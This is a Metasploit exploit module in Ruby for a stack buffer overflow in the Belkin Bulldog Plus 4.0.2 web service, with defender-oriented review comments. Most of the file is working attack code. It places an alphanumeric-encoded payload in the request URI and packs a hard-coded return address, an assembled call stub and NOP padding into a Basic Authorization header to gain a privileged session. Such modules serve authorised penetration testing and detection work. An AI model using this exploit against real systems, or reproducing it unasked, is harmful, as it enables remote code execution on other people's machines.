Path: blob/master/modules/exploits/windows/http/belkin_bulldog.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for a stack buffer overflow in the web service of
# Belkin Bulldog Plus 4.0.2 build 1219 (OSVDB 54395, BID 34033, EDB 8173).
#
# Review notes for defenders:
# * Traffic shape: a single HTTP/1.1 GET whose request URI is the encoded
#   payload (upper-case alphanumeric encoder, at most 750 bytes) and whose
#   "Authorization: Basic" value decodes to raw binary rather than a
#   "user:password" pair. Either property is a usable detection signal.
# * Only one target is listed (Windows XP SP3 English) and it relies on a
#   single fixed return address, so the module as written is tied to that
#   build's memory layout.
# * The metadata sets 'Privileged' => true, i.e. the module declares that a
#   successful run yields a privileged session.
# * No fixed product version is named here; treat 4.0.2 build 1219 as
#   affected and limit network reachability of the web service.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework or a subclass;
  #   merged with this module's own values through update_info.
  def initialize(info = {})
    module_info = {
      'Name' => 'Belkin Bulldog Plus Web Service Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in Belkin Bulldog Plus
        4.0.2 build 1219. When sending a specially crafted http request,
        an attacker may be able to execute arbitrary code.
      },
      'Author' => [ 'MC' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'OSVDB', '54395' ],
          [ 'BID', '34033' ],
          [ 'EDB', '8173' ]
        ],
      'Privileged' => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'AllowWin32SEH' => true
        },
      'Payload' =>
        {
          # Size ceiling and encoding constraints for whatever is placed in
          # the request URI; a NUL byte is the only declared bad character.
          'Space' => 750,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
          # Note: this is the string 'True', not the boolean.
          'DisableNops' => 'True',
        },
      'Platform' => 'win',
      'Targets' =>
        [
          # 'Ret' is a hard-coded address specific to this OS build.
          [ 'Windows XP SP3 English', { 'Ret' => 0x7e4456f7 } ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2009-03-08'
    }

    super(update_info(info, module_info))
  end

  # Sends the single crafted GET request and then hands control to the
  # payload handler.
  #
  # The request carries two attacker-controlled fields: the URI (the encoded
  # payload) and the Basic authorization value (return address, a short
  # assembled instruction and 28 NOP bytes, base64-encoded).
  #
  # NOTE(review): which parser overflows is not visible in this file; the
  # layout suggests the decoded Basic credential is what overwrites the saved
  # return address - confirm against the referenced advisories.
  def exploit
    # Opens the HTTP client connection; the return value is not used.
    connect

    cpu = Metasm::Ia32.new
    call_stub = Metasm::Shellcode.assemble(cpu, "call dword [esp+58h]").encode_string

    # 32-bit little-endian return address, then the stub, then NOP padding.
    auth_blob = [target.ret].pack('V') + call_stub + make_nops(28)

    print_status("Trying target #{target.name}...")

    request = {
      'uri' => payload.encoded,
      'version' => '1.1',
      'method' => 'GET',
      'headers' =>
        {
          'Authorization' => "Basic #{Rex::Text.encode_base64(auth_blob)}"
        }
    }

    # Second argument is the response timeout in seconds.
    send_request_raw(request, 5)

    handler
  end
end